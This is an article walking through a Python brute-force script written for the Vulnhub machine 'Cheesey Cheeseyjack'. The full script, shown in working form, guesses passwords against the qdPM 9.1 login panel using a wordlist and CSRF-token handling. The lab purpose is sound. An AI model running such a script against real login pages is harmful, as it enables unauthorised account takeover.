Python Scripting for Cybersecurity: A Guide to Brute Forcing qdPM 9.1
This script is a Python 3 script that was created to solve a machine on Vulnhub called "Cheesey Cheeseyjack". You can see and follow the walkthrough of the solution for this machine on my profile. Specifically, it was made to Brute Force the Login Panel in qdPM 9.1". The "passwd.txt" file used in the script was created with "cewl", which is a tool that creates a small dictionary using the words on the victim's website.
The script uses the "pwn" library, which is a Python library that contains functions that are useful for exploit development. It also uses the "requests" library, which is a Python library that makes HTTP requests easier to use.
The first thing that the script does is define a signal handler to handle the SIGINT signal. This is done so that if the user decides to interrupt the script by pressing CTRL+C, the script will exit gracefully.
After defining the signal handler, the script defines a global variable called "login_url", which is the URL of the login page that the script will try to brute force.
Next, the script defines a function called "makeBruteForce". This function reads the "passwd.txt" file line by line and tries each password in turn to see if it is the correct password. The function also uses the "pwn" library to display a progress bar that shows the current progress of the brute force attack.
The function starts by opening the "passwd.txt" file and creating a progress bar with the label "Brute Force". It then sets the status of the progress bar to "Starting Brute Force Attack" and waits for 2 seconds.
Recommended by LinkedIn
Next, the function loops over each line in the "passwd.txt" file and tries each password in turn. It uses the "requests" library to create a new session and send a GET request to the login page. It then uses a regular expression to extract a token from the HTML response. This token is used later to send a POST request to the login page.
The function then creates a dictionary called "data_post" that contains the token, the email address, the current password, and the "http_referer" parameter. It then sends a POST request to the login page with the "data_post" dictionary as the data. If the response from the server contains the string "No match", then the current password is not correct, and the function moves on to the next password. If the response does not contain the string "No match", then the password is correct, and the function prints a success message that includes the password and exits the script.
Finally, the script checks if the "name" variable is "main". This is a Python convention that is used to check if the script is being run directly or being imported as a module. If the script is being run directly, then the "makeBruteForce" function is called. If the script is being imported as a module, then the "makeBruteForce" function is not called.
#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, re
def def_handler(sig, frame):
print("\n\n[!] Exiting...\n")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
login_url = "http://ipvictim/project_management/index.php/login"
def makeBruteForce():
f = open("passwd.txt", "r")
p1 = log.progress("Brute Force")
p1.status("Starting Brute Force Attack")
time.sleep(2)
counter = 1
for passwd in f.readlines():
passwd = passwd.strip()
p1.status("Trying Password [%d/148]: %s" % (counter, passwd))
s = requests.session()
r = s.get(login_url)
token = re.findall(r'_csrf_token]" value="(.*?)"', r.text)[0]
data_post = {
'login[_csrf_token]': token,
'login[email]': 'ch33s3m4n@cheeseyjack.local',
'login[password]': passwd,
'http_referer': 'http://ipvictim/project_management/'
}
r = s.post(login_url, data=data_post)
if "No match" not in r.text:
p1.success("The password is %s" % passwd)
sys.exit(0)
counter += 1
if __name__ == '__main__':
makeBruteForce()
--
2moThere is no privacy without security
2yIf you move the login_url and email variables inside the makeBruteForce() function, it can make it easier to change them if needed. You can also use the enumerate() instead of manually incrementing the counter variable and raise the SystemExit instead of calling sys.exit(). For example: